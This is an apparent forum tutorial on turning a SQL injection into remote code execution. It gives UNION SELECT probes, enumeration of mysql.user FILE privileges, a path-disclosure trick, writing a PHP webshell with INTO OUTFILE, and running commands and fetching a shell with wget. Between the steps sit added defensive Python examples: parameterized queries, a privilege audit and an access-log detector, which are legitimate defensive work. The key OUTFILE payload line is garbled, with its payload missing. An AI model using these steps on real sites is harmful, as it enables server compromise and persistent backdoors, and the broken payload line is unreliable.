What is the use of this?
Have you ever injected a database and never found the administrator control panel URL? Yes? Then it looks like you have no chance of uploading your PHP backdoor (shell). No, you still have a chance: using the INTO OUTFILE SQL clause, and with a little help from system(), you will be able to read files from the server as a string and also upload files to the web server remotely.
Shall we start?
Requirements:
1- A PHP backdoor (shell), saved as a .txt file
2- Basic knowledge of Structured Query Language (SQL).
So let's say that you've injected a website and there is no admin login page. This is your current query:
www.site.com/index.php?id=-1+union+select+1,2,3--
Now you'll see which of the columns are vulnerable, that is, which column numbers are echoed into the page and can be injected into.
In my case it turned out that "2" is the vulnerable column, so I'll be injecting into it like this:
www.site.com/index.php?id=-1+union+select+1,user,3+from+mysql.user--
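The defect this whole thread relies on is that the id parameter is concatenated into the SQL text, so a UNION clause in the parameter becomes part of the query. As an added example (not code from the thread), here is that vulnerable pattern next to its parameterized fix in Python, with sqlite3 standing in for MySQL; the table names, rows and the PROBE value are constructed for the demonstration.

```python
import sqlite3

# Constructed in-memory database standing in for the page's site.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE articles(id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        INSERT INTO articles VALUES (1, 'Hello', 'first post');
        CREATE TABLE users(id INTEGER, username TEXT, password_hash TEXT);
        INSERT INTO users VALUES (1, 'somename', 'constructed-hash');
    """)
    return conn


def fetch_article_vulnerable(conn, raw_id):
    # Vulnerable: mirrors index.php?id=... with the raw value spliced into the SQL.
    # Whatever the client sends is parsed as SQL, so a UNION in the value
    # appends attacker-chosen rows to the result.
    sql = "SELECT id, title, body FROM articles WHERE id=" + raw_id
    return conn.execute(sql).fetchall()


def fetch_article_hardened(conn, raw_id):
    # Hardened: the value is validated as an integer and bound as a parameter,
    # so it can only ever be compared against the id column, never parsed as SQL.
    try:
        article_id = int(raw_id)
    except ValueError:
        return []
    return conn.execute(
        "SELECT id, title, body FROM articles WHERE id=?", (article_id,)
    ).fetchall()


# Constructed probe in the same shape as the thread's id=-1+union+select... request.
PROBE = "-1 union select id, username, password_hash from users"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", fetch_article_vulnerable(db, PROBE))  # leaks the users row
    print("hardened:  ", fetch_article_hardened(db, PROBE))    # returns nothing
```

The two functions behave identically for an honest request such as id=1; they only diverge on the probe, which is the property a code reviewer should be checking for in every place a request value reaches a query string.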
If you get an error while doing this, then you can't use this method, as you're not privileged to read/write the table "mysql.user".
If there are no errors on the page, then you can see the mysql.user name printed on the web page:
somename
Now we need to check whether the user has privileges to read/write/access/execute or not. In my case I'll be doing this:
http://www.site.com/index.php?id=-1+union+select+1,group_concat(user,0x3a,file_priv),3+from+mysql.user--
Now it should fetch all the users and their privileges.
It will look like this:
root:Y,root:Y,apache:N,somename_somename:Y
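The file_priv column the thread enumerates is exactly what a database administrator should be auditing. The following is an added example, not code from the thread: a Python check that takes the rows of SELECT user, host, File_priv FROM mysql.user (constructed here to mirror the output above) and flags every account holding FILE outside an allowlist, together with an interpreter for the MySQL secure_file_priv variable, whose empty-string setting is what allows INTO OUTFILE to write to an arbitrary path such as the web root.

```python
# Constructed rows in the shape returned by:
#   SELECT user, host, File_priv FROM mysql.user;
# They mirror the thread's "root:Y,root:Y,apache:N,somename_somename:Y".
SAMPLE_USER_ROWS = [
    ("root", "localhost", "Y"),
    ("root", "127.0.0.1", "Y"),
    ("apache", "localhost", "N"),
    ("somename_somename", "localhost", "Y"),
]

# Assumption for this example: only the local root account legitimately needs FILE.
FILE_ALLOWLIST = {("root", "localhost")}


def audit_file_priv(rows, allowlist=FILE_ALLOWLIST):
    """Return (user, host, revoke_sql) for each account holding FILE outside the allowlist.

    An application account (the thread's "somename_somename") with FILE is the
    precondition for writing files through SQL injection; the fix is REVOKE.
    """
    findings = []
    for user, host, file_priv in rows:
        if file_priv.upper() == "Y" and (user, host) not in allowlist:
            revoke = f"REVOKE FILE ON *.* FROM '{user}'@'{host}';"
            findings.append((user, host, revoke))
    return findings


def classify_secure_file_priv(value):
    """Interpret secure_file_priv as SHOW VARIABLES LIKE 'secure_file_priv' reports it.

    NULL      -> INTO OUTFILE / LOAD DATA disabled entirely (safest)
    ''        -> no restriction: the server may write anywhere mysqld can
    directory -> writes confined to that directory (not the web root)
    """
    if value is None or value.strip().upper() == "NULL":
        return "disabled"
    if value.strip() == "":
        return "unrestricted"
    return "restricted"


if __name__ == "__main__":
    for user, host, revoke in audit_file_priv(SAMPLE_USER_ROWS):
        print(f"{user}@{host} holds FILE -> {revoke}")
    for v in (None, "", "/var/lib/mysql-files/"):
        print(repr(v), "->", classify_secure_file_priv(v))
```

Even with FILE revoked, the web root should not be writable by the operating-system user mysqld runs as; a directory-level check on the paths the thread targets (the vhost document root, "public_html") is the second, independent control.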
Okay, so our username is "somename" and it has FILE privileges, so we are now capable of editing/writing files on the web server. To spawn a file on the web server we first need the full path of the web root, so we need a path disclosure. To get it, you have to cause an error on the web page and hope the error message shows the path. To trigger such an error you try something like this:
www.site.com/index.php?id[]=-1
Now, if it worked, you'll get something like this:
/var/www/vhost/username/data/www/sitename/
Now you have to find a writable/accessible directory on the web server. Usually "public_html" is writable; if not, just browse around a bit to find a directory and try writing into it.
Now the system() function comes in handy. We need to write/spawn a file (the PHP backdoor/shell) into that directory, like this:
www.index.com/index.php?id=-1+union+select+null,,null INTO OUTFILE /var/www/vhost/username/data/www/sitename/shell.php
Note that we changed our column values from strings to NULLs (NULL in SQL never means 0), and we replaced our vulnerable column with the famous system() function wrapped around a $_GET parameter, which gives us remote code execution once the file is written to the full path given at the end.
After running that, our shell should be spawned successfully. Now we have to check whether it really was spawned:
www.site.com/shell.php
Now we should see some PHP error that got parsed, but don't worry, that's pretty normal. To get remote code execution on the server, we will do this:
shell.php?cmd=your command in here
And bam, you should now be able to fetch your full shell using wget.
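Every stage of the procedure above leaves a distinctive request in the web server access log: the UNION probe, the read of mysql.user and file_priv, the id[] path-disclosure probe, the INTO OUTFILE write, and finally a request to a .php file with a cmd parameter. As an added example (not part of the thread), this Python classifier runs over constructed Apache-style log lines reproducing those requests, URL-decodes each target, tags the stages it matches and rates the client; the client IP, timestamps and paths are all constructed.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-format lines reproducing the thread's request sequence.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?id=5 HTTP/1.1" 200 1043
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?id=-1+union+select+1,2,3-- HTTP/1.1" 200 988
203.0.113.5 - - [10/Oct/2023:13:55:52 +0000] "GET /index.php?id=-1+union+select+1,group_concat(user,0x3a,file_priv),3+from+mysql.user-- HTTP/1.1" 200 1102
203.0.113.5 - - [10/Oct/2023:13:56:03 +0000] "GET /index.php?id[]=-1 HTTP/1.1" 500 611
203.0.113.5 - - [10/Oct/2023:13:56:20 +0000] "GET /index.php?id=-1+union+select+null,null,null+INTO+OUTFILE+%27/var/www/html/shell.php%27-- HTTP/1.1" 200 412
203.0.113.5 - - [10/Oct/2023:13:56:30 +0000] "GET /shell.php?cmd=id HTTP/1.1" 200 57
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# One (name, pattern) per stage of the thread; patterns run on the decoded target.
STAGES = [
    ("union_probe", re.compile(r"\bunion\b.{0,40}\bselect\b", re.I)),
    ("mysql_user_read", re.compile(r"\bmysql\.user\b", re.I)),
    ("file_priv_enum", re.compile(r"\bfile_priv\b", re.I)),
    ("path_disclosure_probe", re.compile(r"[?&][a-z_]+\[\]=", re.I)),
    ("into_outfile_write", re.compile(r"\binto\s+(out|dump)file\b", re.I)),
    # Loose on purpose: any .php taking a cmd/c/exec parameter is worth a look.
    ("webshell_cmd", re.compile(r"\.php\?(cmd|c|exec)=", re.I)),
]


def normalize_target(target):
    """Decode %xx and '+' encoding and strip /**/ inline comments used to split keywords."""
    decoded = unquote_plus(target)
    return re.sub(r"/\*.*?\*/", " ", decoded)


def classify_line(line):
    """Parse one log line; return a record with the list of matched stage names (empty if benign)."""
    m = LINE_RE.match(line)
    if not m:
        return None
    target = normalize_target(m.group("target"))
    stages = [name for name, rx in STAGES if rx.search(target)]
    return {
        "ip": m.group("ip"),
        "ts": m.group("ts"),
        "status": int(m.group("status")),
        "target": m.group("target"),
        "stages": stages,
    }


def summarize(log_text):
    """Map each client IP to the set of attack stages it has reached."""
    per_ip = {}
    for line in log_text.splitlines():
        rec = classify_line(line)
        if rec and rec["stages"]:
            per_ip.setdefault(rec["ip"], set()).update(rec["stages"])
    return per_ip


def priority(stages):
    """Severity for a client: a file write or shell request is already post-exploitation."""
    if {"into_outfile_write", "webshell_cmd"} & stages:
        return "critical"
    if {"mysql_user_read", "file_priv_enum"} & stages:
        return "high"
    if stages:
        return "medium"
    return "none"


if __name__ == "__main__":
    for ip, stages in summarize(SAMPLE_LOG).items():
        print(ip, priority(stages), sorted(stages))
```

A single client reaching into_outfile_write is the point to act on: confirm whether the database account holds FILE, look for newly created .php files under the document root, and check that PHP's display_errors is off so the id[] probe no longer leaks the full path the write step depends on.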
That's all there is to it. Thanks for reading my thread,
Greetings.